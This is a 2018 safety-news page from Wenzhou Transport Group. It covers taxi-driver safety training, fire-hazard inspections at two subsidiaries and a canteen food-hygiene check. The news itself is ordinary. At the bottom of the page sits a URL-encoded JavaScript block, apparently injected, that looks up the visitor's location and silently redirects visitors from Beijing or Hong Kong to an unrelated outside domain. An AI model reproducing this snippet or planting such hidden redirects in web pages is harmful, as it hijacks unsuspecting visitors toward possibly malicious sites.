当前位置: 您当前的位置 : 温州交运集团 > 交运资讯 > 安全讯息 >正文
铁腕抓安全 隐患零容忍
来源: 发布时间:2018年11月14日 15:14:09 作者: 字体:

  汽服公司举办安全培训

  10月24日起,汽服公司出租分公司连续召开4场以“礼让斑马线,文明伴我行”为主题的驾驶员安全宣传教育培训,倡议驾驶员做文明礼让的践行者。会议通报了9月份出租车安全行车情况,强调出租车驾驶员要时刻谨记遵守交通法规,发挥表率引领作用,在斑马线前要主动减速并礼让行人,不鸣笛、不抢行,以身作则引领文明出行的良好风气。

  物流、龙发公司开展消防整治

  自10月22日起,物流公司对园区所有承租户开展了为期一月的消防安全排查整治,落实专人进行回访以确保整改到位;并宣传消防安全知识,帮助承租户认识消防设施,学会使用消防器械,掌握消防技能。

  近日,龙发公司根据市委关于开展火灾隐患集中排查整治“百日攻坚”专项行动的要求,制定相关计划并开展行动。公司对出租房违规设置的三木结构、消防四要件的配置、灶间隔断与液化气使用情况、电气套管等问题进行清查整治,建立隐患清单并逐一对照销号清理;并对人员集中区域做好消防设备的检修、维护、设备更新升级工作,全面提升安全防火水平。

   交通技校检查食品卫生

  10月23日,交通技校联合鹿城区市场管理监督局对食堂进行专项检查,切实保障食品安全,为广大师生营造安心、放心的就餐环境。检查人员通过查阅档案资料、现场检查的方式,对食堂餐饮服务许可持证、有关台账登记、食品采购索证索票、食品原料贮存留样、餐具清洗消毒记录以及食堂环境卫生状况等进行了全面仔细检查;并提醒管理人员要进一步加强食堂卫生管理,确保从业人员规范操作,严防食品安全事件的发生。

交运资讯

WENZHOU TRANSPORTATION

交运电子报

GROUP BRIEFING

交运电子报

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%26%2321271%3B%26%2320140%3B%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%26%2339321%3B%26%2328207%3B%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E